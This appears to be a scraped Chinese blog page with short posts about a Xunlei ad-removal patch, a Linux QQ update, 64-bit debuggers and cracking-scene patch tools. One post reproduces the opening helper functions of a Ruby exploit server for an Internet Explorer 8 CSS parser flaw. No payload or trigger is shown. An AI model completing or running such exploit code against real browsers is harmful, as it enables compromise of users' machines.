刚才继续翻又看到迅雷除了新的2114,这个更新速度也太迅速了。重新发个去广告补丁出来,还是那句话,只能去除广告,没有其他的功能。猛击此处下载补丁!猛击此处下载新版迅雷!
话说Linux QQ竟然升级了
今天下午又没出去啊,郁闷。临时有事又出不去了,nngx。从cb上乱逛看到Linux QQ居然升级了,太神奇了。下载下来解压之后发现主版本号是一样的,只是编译号码不一样了。用了一下发现好友竟然能全部刷出来了,难道是人品?
其余的貌似还没有发现有什么新的改进,如果有大的改进的话应该就不是单纯的一个Build编号升级的问题了,连小版本号都没有变化。与那个Windows圈圈不断创造世界纪录的版本号升级速度差距也太大了。目前只有gz的压缩包文件格式,解压之后就可以用了,猛击此处围观,猛击此处直接下载。
Internet Explorer 8 CSS Parser Exploit Code
#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
out_str.split("\n").each do |line|
puts " #{line}"
end
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
def to_uni(str)
res = ""
str.each_byte do |b|
res < < "\x00#{b.chr}"
end
res
end
Two 64bit Debuggers
1.FDBG
fdbg for AMD64 is assembler level debugger for user-mode (ring3) binary applications, running in long mode (64-bit).
Supported platforms:
Windows XP x64, Windows 2003 server x64, Vista x64, Windows 2008 server x64, Windows 7 x64
Linux x64
迅雷7 (7.1.4.2104)去广告补丁
针对刚发布的迅雷7 (7.1.4.2104)版本,该补丁只有去除右侧的flash广告功能,需要其他的功能请Google之。目前还不知道该怎么去掉右侧的那个动态,如果谁知道的还望不吝赐教。
dUP2 christmas skin
Merry christmas,wish u happy everyday! click here to download this skin.
ps:
I am christmas ,will u merry me?
uPPP.v0.6.Retail Patch Creater by UFO-pu55y
A great and beautiful patch generater ,click here to download this software.Via this generater u can create wonderful patchs,just like the files created by dup2.Click here to view the patch created by it.